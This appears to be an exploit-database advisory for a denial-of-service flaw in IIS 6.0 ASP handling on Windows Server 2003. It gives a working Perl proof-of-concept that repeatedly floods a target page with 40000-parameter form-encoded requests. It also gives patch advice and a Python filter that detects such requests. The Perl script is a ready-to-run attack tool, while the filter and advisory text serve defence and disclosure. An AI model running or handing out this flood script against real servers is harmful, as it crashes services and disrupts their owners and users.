An attacker sends a POST request to the ASP page. The POST request contains more than 40000 request parameters and uses x-www-form-urlencoded encoding. Attackers exploit this vulnerability to crash the IIS auxiliary process, which causes the default application pool to be disabled.
PoC Exploit:
    # IIS 6.0 ASP DoS PoC
    # usage: perl IISdos.pl
    use IO::Socket;

    $| = 1;                 # unbuffered output
    $host   = $ARGV[0];     # first argument: host
    $script = $ARGV[1];     # second argument: path of the ASP page
    while (1) {
        $sock = IO::Socket::INET->new(PeerAddr => $host,
                                      PeerPort => 'http(80)',
                                      Proto    => 'tcp');
        $write = "C=A&" x 40000;    # 40000 form parameters
        print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
            . "Connection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            . "Content-Length:" . length($write) . "\r\n\r\n" . $write;
        print ".";
        while (<$sock>) {
            print;
        }
    }

EDB Notes:
In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard SP1, Windows Server 2003 Standard SP0
Solution: Watch for the Microsoft patch and apply the upgrade promptly.
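Until the patch is applied, a filter in front of the server can reject requests shaped like the one described above. The following is an added example, not code from the original page or from Microsoft; the 1000-parameter limit, the function names and the sample requests are assumptions constructed for illustration.

```python
# Added example: pre-filter for form-encoded requests with an excessive
# number of parameters. MAX_PARAMS and all names here are assumptions.
MAX_PARAMS = 1000  # assumed limit, far below the 40000 in the report
BODYLESS_METHODS = {"GET", "HEAD"}

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers, body

def count_params(body: bytes) -> int:
    """Count non-empty name=value segments (a trailing '&' adds none)."""
    return sum(1 for seg in body.split(b"&") if seg)

def inspect(raw: bytes, max_params: int = MAX_PARAMS):
    """Return a list of findings; an empty list means the request passes."""
    method, headers, body = parse_request(raw)
    findings = []
    # The PoC on this page attaches its body to a HEAD request.
    if method in BODYLESS_METHODS and body:
        findings.append(f"{method} request carries a {len(body)}-byte body")
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "application/x-www-form-urlencoded":
        n = count_params(body)
        if n > max_params:
            findings.append(f"{n} form parameters exceeds limit {max_params}")
    return findings

def build(method: str, path: str, body: bytes) -> bytes:
    """Construct a sample request in memory (nothing is sent)."""
    return (f"{method} {path} HTTP/1.1\r\nHost: example.test\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body

# Constructed samples: an ordinary login form and the request shape above.
NORMAL = build("POST", "/login.asp", b"user=alice&pass=x")
FLOOD = build("HEAD", "/page.asp", b"C=A&" * 40000)

if __name__ == "__main__":
    for name, req in (("normal", NORMAL), ("flood", FLOOD)):
        print(name, inspect(req) or "ok")
```

Requests with a non-empty findings list would be rejected or logged before they reach the ASP handler.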